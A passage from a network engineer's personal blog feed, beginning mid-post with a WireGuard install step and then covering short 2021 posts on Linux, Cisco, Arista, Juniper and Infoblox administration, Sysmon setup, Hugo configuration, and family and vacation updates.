curl -O https://raw.githubusercontent.com/angristan/wireguard-install/master/wireguard-install.sh

Example Output:

jemurray@home-server:~$ curl -O https://raw.githubusercontent.com/angristan/wireguard-install/master/wireguard-install.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 15088  100 15088    0     0   8533      0  0:00:01  0:00:01 --:--:--  8529

Make the script executable:

chmod +x wireguard-install.sh

Example Output:

Enable Full Text RSS Feeds in Hugo

Mon, 01 Nov 2021 19:21:46 -0500

By default, Hugo summarizes each article when generating the RSS feed. Not ideal if your the type of person who prefers to read the full content directly in an RSS reader. This post will show you how to enable full text RSS feeds in Hugo.

Here’s an example of a long article summarized in Inoreader:

Here’s the same article after enabling full content RSS feeds:

Preparing to ThreatHunt: Installing and Configuring Sysmon on Windows 10

Fri, 29 Oct 2021 15:53:43 -0500

Overview

Sysmon is a free Windows system service that gathers and logs telemetry information to the Windows event log. For security professionals, it provides detailed information about process creations, network connections, and changes to files which can be used to identify nefarious activities by potential threat actors.

In this article, we will walk through installing and configuring Sysmon on Windows 10. Using a modified copy of SwiftOnSecurity’s excellent base configuration.

Details

Browse to the SwiftOnSecurity GitHub page and clone the sysmon-config repository by clicking the Fork button in the upper right corner. In the next few steps we will modify the configuration for our specific needs:

Capturing packets on Cisco ASA 5585-SSP40 drops per flow bandwidth to 1Gb/s

Wed, 20 Oct 2021 19:59:45 -0500

TL;DR: Capturing packets on a Cisco ASA significantly reduces available bandwidth. Don’t forget to turn them off when finished.

While performing a routine network performance test, I noticed a reduction in available bandwidth on a link normally able to carry around 2.5Gb/s.

Using iperf3 between two 10Gb/s capable perfsonar nodes with an ASA 5585 SSP40 in the middle, I was only able to push around 1Gb/s:

[user@perfsonar-2 ~]$ iperf3 -t 10 -i 1 -c perfsonar-1.example.com
Connecting to host perfsonar-1.example.com, port 5201
[  5] local 10.39.253.177 port 59110 connected to 128.252.5.113 port 5201
[ ID] Interval           Transfer     Bitrate         Retr  Cwnd
[  5]   0.00-1.00   sec   127 MBytes  1.06 Gbits/sec  1226   1010 KBytes
[  5]   1.00-2.00   sec   120 MBytes  1.01 Gbits/sec    0   1.14 MBytes
[  5]   2.00-3.00   sec   121 MBytes  1.02 Gbits/sec    0   1.28 MBytes
[  5]   3.00-4.00   sec   120 MBytes  1.01 Gbits/sec    0   1.52 MBytes
[  5]   4.00-5.00   sec   120 MBytes  1.01 Gbits/sec   88    949 KBytes
[  5]   5.00-6.00   sec   120 MBytes  1.01 Gbits/sec    0   1.08 MBytes
[  5]   6.00-7.00   sec   120 MBytes  1.01 Gbits/sec    0   1.22 MBytes
[  5]   7.00-8.00   sec   119 MBytes   996 Mbits/sec    0   1.42 MBytes
[  5]   8.00-9.00   sec   120 MBytes  1.01 Gbits/sec    0   1.71 MBytes
[  5]   9.00-10.00  sec   120 MBytes  1.01 Gbits/sec   86   1.02 MBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate         Retr
[  5]   0.00-10.00  sec  1.18 GBytes  1.01 Gbits/sec  1400             sender
[  5]   0.00-10.03  sec  1.17 GBytes  1.00 Gbits/sec                  receiver

Confirmed the ASA is running packet captures on the inside interface:

Configuring Linux to respond to any IP address within a subnet block (example 10.0.0.0/8)

Fri, 24 Sep 2021 16:12:08 -0500

TL;DR

Instead of manually configuring individual interfaces with IP addresses, enable anyip to respond to all ip addresses in the 10.0.0.0/8 subnet with the following command:

sudo ip -4 route add local 10.0.0.0/8 dev lo

Confirm with ping:

# ping 10.123.12.45
PING 10.123.12.45 (10.123.12.45) 56(84) bytes of data.
64 bytes from 10.123.12.45: icmp_seq=1 ttl=64 time=0.050 ms
64 bytes from 10.123.12.45: icmp_seq=2 ttl=64 time=0.062 ms
64 bytes from 10.123.12.45: icmp_seq=3 ttl=64 time=0.062 ms

Details

Overview

For a variety of reasons, it may be necessary for a server to respond to any IP address within a given subnet. For example, a honeypot attached to a /24 darknet subnet or a network lab simulator host which responds to anything in the 0.0.0.0/0 supernet.

Fixing vmware boot error: Unsupported or invalid disk type 2 for 'scsi0:0'

Wed, 15 Sep 2021 20:46:38 -0500

After downloading an old version of Metasploitable, the following error appears when trying to boot:

Failed to power on virtual machine Metasploitable2-Linux. Unsupported or invalid disk type 2 for 'scsi0:0'. Ensure that the disk has been imported. Click here for more details.

To fix the problem, ssh into the vmware host and run the command:

vmkfstools -i Metasploitable.vmdk MetasploitableFixed.vmdk

Full output:

[root@vm02:/vmfs/volumes/5e909c57-02b960e8-e12a-d4ae52a130ac/metasploitable] vmkfstools -i Metasploitable.vmdk MetasploitableFixed.vmdk
Destination disk format: VMFS zeroedthick
Cloning disk 'Metasploitable.vmdk'...
Clone: 100% done.

Delete the broken hard disk:

Update Required: zero-day zero-click vulnerability found in Apple iMessage

Mon, 13 Sep 2021 10:27:58 -0500

Citizens Lab discovered a vulnerability in the Apple iMessenger application that requires no user interaction to exploit.

What does this mean in laymen’s terms? It’s possible for anyone to send your phone or computer a specially crafted text message which allows them to take over control of your device(s). This includes reading your private messages, viewing your camera, listening to your conversations, or accessing any information stored on or accessed by your device.

Linux Entered the World 30 Years Ago Today

Wed, 25 Aug 2021 16:30:44 -0500

On August 25, 1991 Linus Torvalds released Linux to the world with his post on comp.os.minix. Today marks the 30 year anniversary.

  From: torvalds@klaava.Helsinki.FI (Linus Benedict Torvalds)
  Newsgroups: comp.os.minix
  Subject: What would you like to see most in minix?
  Summary: small poll for my new operating system
  Message-ID:
  Date: 25 Aug 91 20:57:08 GMT
  Organization: University of Helsinki

  Hello everybody out there using minix -

  I'm doing a (free) operating system (just a hobby, won't be big and
  professional like gnu) for 386(486) AT clones.  This has been brewing
  since april, and is starting to get ready.  I'd like any feedback on
  things people like/dislike in minix, as my OS resembles it somewhat
  (same physical layout of the file-system (due to practical reasons)
  among other things).

  I've currently ported bash(1.08) and gcc(1.40), and things seem to work.
  This implies that I'll get something practical within a few months, and
  I'd like to know what features most people would want.  Any suggestions
  are welcome, but I won't promise I'll implement them :-)

                Linus (torvalds@kruuna.helsinki.fi)

  PS.  Yes - it's free of any minix code, and it has a multi-threaded fs.
  It is NOT protable (uses 386 task switching etc), and it probably never
  will support anything other than AT-harddisks, as that's all I have :-(.

It’s amazing to reflect on the impact this post has on modern computing. I owe my entire career to Linus, if he didn’t create Linux I may not have entered the systems engineering field. The world would not be reading this message I wrote in markdown, checked into a git repository, rsynced to a Debian server, and rendered on an nginx web server, to be displayed by people running open protocol web browsers.

TCP Congestion Control Algorithms in Linux

Fri, 20 Aug 2021 13:02:18 -0500

Overview

How to check and set TCP congestion control algorithms (CCA) in Linux.

Details

Check Current CAA

sysctl net.ipv4.tcp_congestion_control

Output Example:

jemurray@home-server:~$ sysctl net.ipv4.tcp_congestion_control
net.ipv4.tcp_congestion_control = cubic

View Available CCAs

Check for the default CCAs in Ubuntu:

sysctl net.ipv4.tcp_available_congestion_control

Output Example:

jemurray@home-server:~$ sysctl net.ipv4.tcp_available_congestion_control
net.ipv4.tcp_available_congestion_control = reno cubic

Load Additional Modules

Linux has quite a few different CCAs available: https://en.wikipedia.org/wiki/TCP_congestion_control - Not all are loaded in the kernel by default.

List installed, but not necessarily loaded CCAs:

Headless X Session with x11vnc

Mon, 16 Aug 2021 14:47:49 -0500

Overview

It’s possible to securely run graphical workloads on headless remote Linux servers using x11vnc, ssh, and xvfb.

Configuration

Install Software

In this example, the software is installed on a stock Ubuntu server.

x11vnc: The server creating the X11 session
xvfb: The virtual frame buffer for headless systems
fluxbox: Lightweight window manager

sudo apt install x11vnc xvfb fluxbox

Setup VNC Server

VNC does not encrypt traffic by default. To securely connect, we wrap the VNC session in a port forwarded ssh tunnel. To simplify the process, the following one-line command will setup a ssh tunnel, start the x11vnc server with xvfb, and setup the fluxbox windows manager:

Creating a Python Development Environment using Docker

Sat, 14 Aug 2021 23:07:27 -0500

Overview

Create a standalone development environment with the latest version of Python using docker.

In this example, we are running macOS 11.5.1:

jemurray@phalanges:~/foo $ sw_vers
ProductName:	macOS
ProductVersion:	11.5.1
BuildVersion:	20G80

Which has Python 3.8.2:

jemurray@phalanges:~ $ /usr/bin/python3 --version
Python 3.8.2

With docker we can install the latest version of Python in an isolated container without affecting the operating system and possibly breaking a core system function.

Examples

Run an interactive Python environment using the lightweight Alpine Linux base image:

macOS coreaudiod high CPU utilization with Firefox or Chrome

Tue, 27 Jul 2021 16:49:34 -0500

For weeks the fans in my MacbookPro 15" laptop have been running at full speed, the aluminum case is hot to the touch, and the battery hardly lasts for more then a few hours.

While searching for the culprit, I regularly notice the process coreaudiod is using between 10 and 20 percent of the cpu.

_coreaudiod      96616   17.4  0.1  6098756  30144   ??  Ss   13Jul21 1679:26.11 /usr/sbin/coreaudiod

Using lsof, we can narrow down what processes are utilizing the coreaudiod services:

Ten Year Anniversary of IPv6 at WashU

Wed, 26 May 2021 07:53:43 -0500

Ten years ago today (May 26, 2011), I enabled IPv6 on the WashU edge, core, and DNS infrastructure.

Here is the first IPv6 DNS packet to traverse the IPv6 stack (I know, it does not return an IPv6 answer, we had to start somewhere…):

jemurray@phalanges:~/ipv6 $ cat first-dns-query.txt
May 26 2011 7:50AM CDT


unicast
============
jemurray@kimber:~ $ dig @2604:3e00:0:4::1 wustl.edu

; <<>> DiG 9.6.0-APPLE-P2 <<>> @2604:3e00:0:4::1 wustl.edu
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10359
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;wustl.edu.			IN	A

;; ANSWER SECTION:
wustl.edu.		3600	IN	A	128.252.73.216

;; Query time: 21 msec
;; SERVER: 2604:3e00:0:4::1#53(2604:3e00:0:4::1)
;; WHEN: Thu May 26 07:36:28 2011
;; MSG SIZE  rcvd: 43




Anycast
============

jemurray@kimber:~ $ dig @2604:3e00::1 wustl.edu

; <<>> DiG 9.6.0-APPLE-P2 <<>> @2604:3e00::1 wustl.edu
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62345
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;wustl.edu.			IN	A

;; ANSWER SECTION:
wustl.edu.		3600	IN	A	128.252.73.216

;; Query time: 18 msec
;; SERVER: 2604:3e00::1#53(2604:3e00::1)
;; WHEN: Thu May 26 07:53:43 2011
;; MSG SIZE  rcvd: 43

Maintain a persistent IRC connection with ZNC (Debian), LimeChat (macOS), and Palaver (iOS)

Tue, 04 May 2021 16:23:41 -0500

Overview

Prior to Slack, Teams, iMessage, Discord, WeChat, Signal, and the plethora of communication platforms, we had IRC. Unlike todays crop of chat networks, IRC is built on top of an open communication protocol. These open standards facilitate innovation by allowing developers to design clients to meet the needs of their users, move data between providers, and gain a deeper understanding of data management, without being encumbered by proprietary platforms.

IRC is a real time communication platform, it struggles with persistent chat history or seemless support of stateful simultaneous clients (ie. mobile and desktop). I would be amiss to ignore over this glaring gap in functionality many of the more predominate clients of today offer. IRC is still under active development. Enhancements under the IRCv3 working group are adding features like chat history and server time to facilitate more robust persistence and history features.

pip search fails with the error: xmlrpc.client.Fault

Thu, 22 Apr 2021 08:50:48 -0500

According to this GitHub issues thread the PyPi maintainers disabled the pip search API due to overwhelming the servers with search queries.

This behavior is replicated on a RedHat 8 server using the pip3 search command:

[jemurray@unix-host ~]$ pip3 search rdiff-backup
Exception:
Traceback (most recent call last):
  File "/usr/lib/python3.6/site-packages/pip/basecommand.py", line 215, in main
    status = self.run(options, args)
  File "/usr/lib/python3.6/site-packages/pip/commands/search.py", line 45, in run
    pypi_hits = self.search(query, options)
  File "/usr/lib/python3.6/site-packages/pip/commands/search.py", line 62, in search
    hits = pypi.search({'name': query, 'summary': query}, 'or')
  File "/usr/lib64/python3.6/xmlrpc/client.py", line 1112, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python3.6/xmlrpc/client.py", line 1452, in __request
    verbose=self.__verbose
  File "/usr/lib/python3.6/site-packages/pip/download.py", line 779, in request
    return self.parse_response(response.raw)
  File "/usr/lib64/python3.6/xmlrpc/client.py", line 1342, in parse_response
    return u.close()
  File "/usr/lib64/python3.6/xmlrpc/client.py", line 656, in close
    raise Fault(**self._stack[0])
xmlrpc.client.Fault: <Fault -32500: "RuntimeError: PyPI's XMLRPC API is currently disabled due to unmanageable load and will be deprecated in the near future. See https://status.python.org/ for more information.">

Use the pip-search command as an alternative.

Domain redirection with AWS S3 buckets and Route 53 DNS

Wed, 21 Apr 2021 06:44:30 -0500

Overview

This guide walks though the steps required to redirect web requests for a domain such as http://example.com/ to http://example.org using AWS S3 buckets and Route 53 DNS services.

Details

Create a new S3 bucket:

Create the bucket with the exact name of the website to redirect. In this example the domain name is bsa957.org:

Enable public access by unchecking the Block All Public Access option:

How to generate and use temporary licenses on an Infoblox appliance

Sun, 18 Apr 2021 06:54:04 -0500

Overview

For lab use, Infoblox offers 60 day temporary licenses. When the the trial period is over, use the reset all licenses command to reset the timer for another 60 days. But wait, it can’t be that easy? There is a downside to resetting the licenses, all settings and configurations are wiped out at the same time. Rebuilding a production system every 60 days is not very practical, but for a lab it is OK.

One Year Later: 365 Consecutive Blog Posts

Sat, 17 Apr 2021 17:22:08 -0500

365th Post!

Today marks the 365th consecutive post on this blog since April 17, 2020. One year ago, I set a goal to write something new at least once a day for an entire year. While it has been fun to share, I can’t continue at this pace. The amount of effort required to find, research, write, and proofread, is taking up too much of my time. There are days when a post takes 15 minutes, and others where I spend 3+ hours writing. I believe on average I am putting in at least 1 hour per day. Moving forward, I am going to cut back in order to spend more time on side projects and put more effort into the posts I create.

Enable SSH on Infoblox Appliances

Fri, 16 Apr 2021 14:46:41 -0500

By default ssh console access to an Infoblox appliance is disabled. To enable, from the serial console execute:

set remote_console

Full output:

Infoblox > set remote_console
Enable remote console access (grid-level)? (y or n): y

 New Remote Console Access Settings:
    Remote Console access enabled: Yes
        is this correct? (y or n):  y

Note: It takes a few minutes for ssh to start.

ssh into the system:

jemurray@phalanges:~ $ ssh admin@192.168.86.15


Disconnect NOW if you have not been expressly authorized to use this system.
admin@192.168.86.15's password:


               Infoblox NIOS Release 8.5.1-397728 (64bit)
     Copyright (c) 1999-2020 Infoblox Inc. All Rights Reserved.

                   type 'help' for more information


Infoblox >

Configure an OpenGear serial port from the CLI

Thu, 15 Apr 2021 09:24:30 -0500

ssh into the serial console:

jemurray@bastion-host:~$ ssh opengear-console.example.com
Password:
$

Use the config command to change settings (example options):

$ config

usage: config [ -ahv ] [ -d id ] [ -g id ] [ -p path ] [ -r configurator ] [ -s id=value ] [ -P id ]
 -a --run-all		Run all registered configurators.
 -h --help		Display this message.
 -v --verbose		Log extra debug info.
 -T --trace		Log extra trace info.
 -d --del=id		Remove the given config element.
 -g --get=id		Display the value of a config element.
 -p --path		Use an alternate config file.
 -r --run=configurator	Run the specified registered configurator.
 -s --set=id=value	Change the value of config element.
 -e --export=file	Save active configuration to file.
 -i --import=file	Load configuration from file.
 -t --test-import=file	Pretend to load configuration from file.
 -I --strict-import=file	Load configuration from file only if vendor and product are correct.
 -S --separator=char	The pattern to separate fields with, default is '.'.
 -P --password=id	Prompt for a user password, encrypt it, then save it in 'id'.

Display settings on port 33:

How to receive a free COVID-19 vaccination without an appointment in the St. Louis Missouri area

Wed, 14 Apr 2021 16:55:52 -0500

Overview

Missouri is offering COVID-19 vaccines to all individuals over the age of 16. To accommodate the influx of people, the city of St. Louis setup a mass vaccination center at the America’s Center Dome. While preregistering through the Missouri Vaccine Navigator or by calling 877-435-8411 is recommended, walk-ups are welcome from 8AM to 6PM 7 days a week.

My wife and daughter received their vaccines from this location on two separate occasions. While both visits went without any significant issues, finding specific information, a place to park, and the entrance may be confusing to some.

Link packet capture in Cisco Modeling Lab

Tue, 13 Apr 2021 15:46:54 -0500

Overview

To inspect network traffic on the wire, Cisco Modeling Lab provides a native packet capture interface. This feature enables packet analysis without configuring the more complicated span port and capture device.

Details

Click the router link, then start, to enable a packet capture:

A spinning box and Waiting for packets... appears:

Packets are displayed in real time as they pass through the link:

Renewing a CML license

Mon, 12 Apr 2021 06:43:45 -0500

In March 2021, my Cisco Modeling Lab (CML) license expired. Last year I purchased the standard 20 node license. However, with 64 CPUs and 1T of memory my lab has horsepower to spare. I upgraded to the 40 node license this year. To move between license a few additional steps are required.

Enter the Tools -> Licensing menu:

I am not 100% sure this step is necessary, but I deregistered the product first since a new license was generated:

My daughter received the first dose of the Pfizer vaccine today

Sun, 11 Apr 2021 15:43:46 -0500

Missouri entered phase 3 of the COVID-19 vaccine rollout this past week. Anyone 16 years or older is eligible to receive the shot. Our family seized the opportunity to do our part and help stop the spread of this dreadful disease. After reviewing the Missouri Vaccine Navigator website, we determined due to low turnout, walk ups are welcomed at the St. Louis mass vaccination center in the America’s Center Dome. Even with numerous road closures and a bit of confusion finding the proper entrance due to the auto show, the overall process was quick and easy.

Using BFD to reduce BGP convergence

Sat, 10 Apr 2021 13:53:03 -0500

Overview

Given the following topology:

By enabling bfd on an eBGP session between the edge-2 and isp-1 routers, BGP convergence (route withdrawl) on a failed link is reduced from 150 seconds to less then 1 second.

Details

To automate counting the number of seconds before the routes are withdrawn, I run a tcl script (because Cisco only supports TCL scripting even though it is 2021) on the router. Run the script by typing tclsh and pasting the script below:

Clipboard manager

Fri, 09 Apr 2021 14:43:19 -0500

Viewing and recalling items copied into the clipboard should be a standard option within the operating system. However, it is not and third-party software is required.

I don’t know how many times I find myself switching back to a virtual desktop, reopening a closed window, or searching again for a piece of information in the clipboard just minutes before. Enter a clipboard manager. This software stores the latest bits of information stuffed into the clipboard then provides a menu or set of hotkeys to quickly view and paste specific entries.

iTerm2 Status Bar

Thu, 08 Apr 2021 09:34:30 -0500

The status bar feature in iTerm2 offers a clean interface to display up-to-date information about the current working environment, including scriptable interactions when needed.

Setup the status bar by entering Preferences -> Profile -> Session -> Configure Status Bar:

Add the appropriate components to display or configure. I tend to use the terminal when troubleshooting performance issues on my MacBook. In this example, we enable battery, cpu, memory, and network statistics to aid in troubleshooting:

Basic Arista Tap Aggregation Configuration

Wed, 07 Apr 2021 16:29:59 -0500

Overview

Arista’s Tap Aggregation feature turns switch(es) into packet capture, aggregation, and distribution points. This setup allows network operators to setup capture points over large geographic areas then centralize the collection point to a single data center.

The following diagram is an example topology of two different geographic areas performing packet captures and sending the output to a centralized cluster of servers for analysis:

Details

Tap / Tool Mode

To enable Tap Aggregation mode, each port on the switch is configured as either a tool or a tap. A tool port is an interface that replicates data streams received by one or more tap ports. A tap port is an interface that receives a packet capture from a physical tap or span / monitor port.

Rebead and inflate a small tire

Tue, 06 Apr 2021 16:07:21 -0500

To inflate a tire, there must be an airtight seal on the bead between the tire and rim. When the seal breaks on a small tire, like the one on a wheelbarrow, it is impossible to inflate.

To reseat the bead, attach a ratchet strap around the tire and slowly snug it up until the bead pushes out to the rim:

After the ratchet strap applies enough pressure, the bead will seal against the rim. Attempt to air-up the tire:

The 2018 Wikaryasz family reunion fire pit

Mon, 05 Apr 2021 22:07:59 -0500

Every three years Jami’s family gathers for the Wikaryasz family reunion. From Alaska to Maine, over 100 family members coverage at the original homestead in Alpena, MI.

In 2018, we won a custom made fire pit with all three spelling of the Wikaryasz name cut into the steal. Three years later, we used it for the first time:

Pay attention to the user experience

Sun, 04 Apr 2021 16:56:25 -0500

As the network architect, a significant part of my job is building systems our users enjoy using. Since I work on the networking team, I am hyper-focused on building interfaces or process that help our users attach to the network. From wired, wireless, or remote access VPN, our team pays special attention to making the connection process hassle free.

My appreciation for the user experience goes beyond the commonplace technology interface. This past week, I checked in at a BJC medical center for a routine medical procedure. Upon arrival, someone instantly acknowledged me, asking if I was here for a procedure. When I answered “yes”, they directed me to the elevator and told me to “push the procedure button”.

Share Wi-Fi password with other Apple iDevices

Sat, 03 Apr 2021 20:07:01 -0500

Overview

Apple removed the complexity of sharing Wi-Fi passwords with other iDevices. When one device is already connected to the network, it will attempt to share the Wi-Fi password with any new iDevice attempting to connect.

Details

In this example my iPhone is connected to the Wi-Fi network, but the iPad is not. By entering Settings -> Wi-Fi on the iPad and selecting the appropriate network:

Render raw html in HUGO markdown files

Fri, 02 Apr 2021 06:32:30 -0500

By default Hugo will not render embedded html in markdown files. To enable, add the following lines to config.toml:

[markup.goldmark.renderer]
  unsafe = true

Entering the raw html:

<h1>hello world!</h1>

Renders:

hello world!

My daughter is featured in the St. Louis Post as an athlete of the week!

Thu, 01 Apr 2021 15:39:01 -0500

Allie Murray • Lutheran St. Charles soccer

A junior midfielder and team captain, Murray helped the Cougars capture the championship of their own tournament and was named the event’s MVP. In the round robin tourney format, Murray had one goal and two assists in an 8-0 win over Hazelwood Central, three goals and one assist in a 4-0 victory over Sullivan and two goals in a 7-2 win over Festus. She was a starter as a freshman and put up 12 goals and 14 assists to earn Class 2 all-state honors. In basketball, she averaged 3.2 points and 2.2 assists in 17 games this season.

Adding plausible.io analytics to Hugo

Wed, 31 Mar 2021 14:03:54 -0500

Overview

This year (2021) I removed Google Analytics and Disqus from my Hugo managed website to enhance the privacy of visitors. Site statistics is not a requirement, I am not selling anything or making an attempt to optimize readership. However, it is nice to know what people are interested in reading. At some point I may try to tailor content that is more interesting to my readers instead of whatevers top of mind for the day.

Using rsync to move large datasets

Tue, 30 Mar 2021 16:53:39 -0500

Overview

When moving a single file from one host to another, traditional commands like scp or sftp do the job just fine. However, when large data sets are involved better tooling is required.

The rsync command is design to transfer files and directories between network connected hosts or directories on a local file system. rsync uses the rsync algorithm, which only transfers parts of the file(s) that have changed. With the archive option, rsync will maintain time stamps, ownership, and links, making it an ideal tool for directory synchronization or backups.

Generating random BGP prefixes with routem

Mon, 29 Mar 2021 20:54:58 -0500

Overview

In a previous post, I used exabgp and a BGP snapshot from RIPE to simulate a full Internet routing table.

For those looking for a less complicated way to simulate large routing tables, the routem software will generate any number of prefixes and random AS paths with a few lines of configuration.

Network Topology

This lab uses the following eBGP router topology and IP addresses:

isp-1 (172.16.200.1) <-> external-linux-1 (172.16.200.2)
isp-1 (192.160.0.1) <-> edge-2 (192.168.0.0)
isp-1 (192.168.0.3) <-> edge-1 (192.168.0.2)

Access a Linux shell on an Arista switch

Sun, 28 Mar 2021 20:49:07 -0500

Access a Linux shell on an Arita switch by running bash:

arista-switch#bash


Arista Networks EOS shell

Full bash shell:

[admin@arista-switch ~]$ uptime
 20:48:39 up  1:50,  2 users,  load average: 0.19, 0.18, 0.18

Partitioning and formatting a disk in Linux with gdisk and ext4

Sat, 27 Mar 2021 06:34:33 -0500

In this server, /dev/sdb is an unconfigured 36T disk in a RAID-5 configuration:

[jemurray@wuit-s-00229 ~]$ ls -al /dev/sd*
brw-rw----. 1 root disk 8,  0 Mar 24 10:08 /dev/sda
brw-rw----. 1 root disk 8,  1 Mar 24 10:08 /dev/sda1
brw-rw----. 1 root disk 8,  2 Mar 24 10:08 /dev/sda2
brw-rw----. 1 root disk 8,  3 Mar 24 10:08 /dev/sda3
brw-rw----. 1 root disk 8,  4 Mar 24 10:08 /dev/sda4
brw-rw----. 1 root disk 8, 16 Mar 24 10:08 /dev/sdb

Partition /dev/sdb with gdisk:

Juniper fxp0 management interface

Fri, 26 Mar 2021 11:04:05 -0500

Overview

On a Juniper router the fxp0 interface does not show up in the “standard” interface configuration output. Instead, it is grouped with the router engines configuration.

Details

Looking at the routing table, we see the 172.21.16.0/24 network is associated with the fxp0.0 interface:

jemurray@LAB-MX480> show route 172.21.16.0

inet.0: 9 destinations, 10 routes (9 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

172.21.16.0/24     *[Direct/0] 6d 23:01:48
                    >  via fxp0.0
                    [Direct/0] 6d 23:01:48
                    >  via fxp0.0

show interfaces details information about the fxp0.0 interface:

Internal and Documentation IP Blocks

Thu, 25 Mar 2021 16:50:27 -0500

Overview

Prior to 2010, the IP block 1.0.0.0/8 was considered unassigned before its allocation to ARIN. Many organizations considered this unassigned space available for private use within their products or documentation.

In 2018 Cloudflare purchased the 1.1.1.0/24 allocation for their anycast DNS service. This is when they found out how many network connected devices were misconfigured with addresses allocated from this block, most notably the 1.1.1.1 address. Early measurements documented ~10Gb/s of background traffic.

Using the Python mailmerge command to send customized emails

Wed, 24 Mar 2021 14:35:38 -0500

Overview

Mailmerge is a Python command line tool to send individual customized email messages based on Jinja2 templates and an email database.

Details

Install mailmerge:

pip install mailmerge

Configure the system by creating sample configuration files:

(.venv) jemurray@phalanges:~/Documents/src/personalPython/mailmerge $ mailmerge --sample
Created sample template email "mailmerge_template.txt"
Created sample database "mailmerge_database.csv"
Created sample config file "mailmerge_server.conf"

Edit these files, then run mailmerge again.

The mailmerge_template.txt is the source of the email message. The file is a Jinja2 template where variables are stored in {{variables}}. Each of these fields are replaced with data from the mailmerge_database.csv.

Day 7 of our Florida Vacation

Tue, 23 Mar 2021 13:24:30 -0500

Day 7:

Flying home…

Day 6 of our Florida Vacation

Mon, 22 Mar 2021 13:24:30 -0500

Day 6:

All vacations must come to an end. Packed up and left the rental house.
Stopped in Little Havana for lunch.
Drove by the Miami beach shoreline for a quick view at spring break in the pandemic… You wouldn’t know a pandemic was in full swing.
Visited the Wynwood Walls art gallery.
Slept at a Fort Lauderdale hotel so we could easily catch our flight the following day.

Day 5 of our Florida Vacation

Sun, 21 Mar 2021 13:24:30 -0500

Day 5:

Visited Fort Jefferson at Dry Tortugas National Park (all day event)

Day 4 of our Florida Vacation

Sat, 20 Mar 2021 13:24:30 -0500

Day 4:

Hung out at the house
Visited the Turtle Hospital
Watched another sunset and hung out with friends

Day 3 of our Florida Vacation

Fri, 19 Mar 2021 13:24:30 -0500

Woke up to this guy hanging out at our dock:

Day 3:

Slept in late
Kayaked from our house
Snorkeled at a public beach
Hung out at the house

Day 2 of our Florida Vacation

Thu, 18 Mar 2021 13:24:30 -0500

Day 2:

Woke up early
Chartered a private boat to go kayaking and snorkeling
Rented scooters to explore Key West
Stood on southern most point of the United States
Watched another sunset

Day 1 of our Florida Vacation

Wed, 17 Mar 2021 13:24:30 -0500

Jami and I hopped on an airplane destined for Fort Lauderdale, FL, where we met up with our long time friends Andrea and Vaughn:

Day 1:

Travel: Flying / Driving
Robbie’s to feed the fish and take a break
Keys Fisheries where we at at the raw bar and watch the sunset
Grocery shop
Arrive and unpack at the rental house
Hang out for the evening

First vacation of 2021

Tue, 16 Mar 2021 12:21:49 -0500

In 24 hours my wife and I will be sitting on a beach in the warm Florida sun. I know many of you rely on my blog to start your day, learn something new, or obtain the latest status on my family life. While I will make every effort to spend a few minutes posting a quick update, I offer no guarantee. Family time and my ability to unplug, come first.

CLI to turn a directory of images into Markdown links

Mon, 15 Mar 2021 06:14:54 -0500

Overview

Convert a directory of images to clickable Markdown links:

for i in `IMG_17*.jpg`; do echo $i | awk '{print "[![Image of philmont prep hike](/images/" $1" )](/images/" $1 ")"}'; done

Details

for i in... -> Loop over each file, placing filename in the variable i.
ls -1 IMG_17*.jpg -> List files matching the filename pattern. Then feed into the for loop.
echo $i -> Print the variable i.
awk (There are 2 key points, printing and variable expansion):
- print -> Print everything after this statement to the screen. Text between "’s is printed as written. $ (variables) are expanded and printed.
- $1 -> Print the first match from awk. In this case, print the filenames |‘ed through awk.

jemurray@phalanges:~/Downloads $ for i in `IMG_17*.jpg`; do echo $i | awk '{print "[![Image of philmont prep hike](/images/" $1" )](/images/" $1 ")"}'; done
[![Image of philmont prep hike](/images/IMG_1706.jpg )](/images/IMG_1706.jpg)
[![Image of philmont prep hike](/images/IMG_1707.jpg )](/images/IMG_1707.jpg)
[![Image of philmont prep hike](/images/IMG_1708.jpg )](/images/IMG_1708.jpg)
[![Image of philmont prep hike](/images/IMG_1711.jpg )](/images/IMG_1711.jpg)
[![Image of philmont prep hike](/images/IMG_1712.jpg )](/images/IMG_1712.jpg)
[![Image of philmont prep hike](/images/IMG_1713.jpg )](/images/IMG_1713.jpg)
[![Image of philmont prep hike](/images/IMG_1714.jpg )](/images/IMG_1714.jpg)
[![Image of philmont prep hike](/images/IMG_1715.jpg )](/images/IMG_1715.jpg)
[![Image of philmont prep hike](/images/IMG_1716.jpg )](/images/IMG_1716.jpg)
[![Image of philmont prep hike](/images/IMG_1717.jpg )](/images/IMG_1717.jpg)
[![Image of philmont prep hike](/images/IMG_1718.jpg )](/images/IMG_1718.jpg)
[![Image of philmont prep hike](/images/IMG_1720.jpg )](/images/IMG_1720.jpg)
[![Image of philmont prep hike](/images/IMG_1722.jpg )](/images/IMG_1722.jpg)

The commands above generated this page: https://jasonmurray.org/posts/2021/firstlongphilmontprephike/

Philmont training hike #2: Lone Elk Park

Sun, 14 Mar 2021 16:42:09 -0500

In the summer of 2022, my sons scouting troop is taking 3 crews to Philmont for a 12 day backpacking adventure. Today, we set out for our first long hike in preparation for the long miles that lay ahead. The goal was 10 miles. However, flooded trails cut us back to 7.5 miles. To compensate, we spent the last mile walking up a pretty steep hill before calling it quits at the parking lot.

Creating an iOS shortcut to add RSS news feeds to Miniflux

Sat, 13 Mar 2021 15:28:57 -0600

Overview

Miniflux is a minimalist RSS feed reader. It does not have an iOS application to facilitate adding new feeds through the share button. To compensate, I created an iOS shortcut which uses the Miniflux API to discover the RSS URL and add it to the feeds list.

Installation Instructions

Create and copy an API key here: https://reader.miniflux.app/keys
Determine the category ID for all new feeds here: https://reader.miniflux.app/v1/categories
Save the API key and Category ID. The import process will ask for this information during installation.
Download the shortcut here: https://www.icloud.com/shortcuts/dddc998202db45b7931c254781df3beb

